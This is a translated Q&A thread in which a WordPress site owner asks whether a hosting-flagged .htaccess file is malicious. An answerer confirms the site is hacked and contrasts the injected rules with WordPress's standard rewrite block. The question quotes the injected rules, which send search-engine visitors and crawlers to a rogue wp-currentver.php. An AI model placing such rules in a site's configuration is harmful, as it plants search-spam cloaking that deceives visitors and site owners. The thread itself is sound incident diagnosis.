#php #wordpress #.htaccess #malware
#php #wordpress #.htaccess #вредоносное ПО
Вопрос:
Godaddy пометил мой файл /html/.htaccess как возможный вредоносный.
Является ли это вредоносным? Fwiw, он также помечен wp-currentver.php как возможное вредоносное ПО.
Мой сайт выглядит нормально, кажется, работает нормально.
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /wp-currentver.php?p=$1 [L]
# BEGIN WordPress
# END WordPress
Ответ №1:
Тебя взломали.
Это перенаправления, которые определяют, просматривает ли кто-то результаты поиска Google с помощью Google в качестве реферера; стандартный блок перезаписи WordPress (не для нескольких сайтов) находится на https://codex.wordpress.org/htaccess т. е.:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
И файл wp-currentver.php вредоносный, а не ядро WordPress. Также смотрите https://productforums.google.com/forum /#!тема/веб-мастера/f4Cw1k1-j6g
Внимательно следите за часто задаваемыми вопросами Мой сайт был взломан — WordPress Codex.
Найдите более безопасный хост.
Затем взгляните на рекомендуемые меры безопасности в разделе Защита WordPress — WordPress Codex и атаки методом перебора — WordPress Codex
Комментарии:
1. FWIW Я также нашел копию того, что должно быть в htacess: htaccess — WordPress Codex codex.wordpress.org/htaccess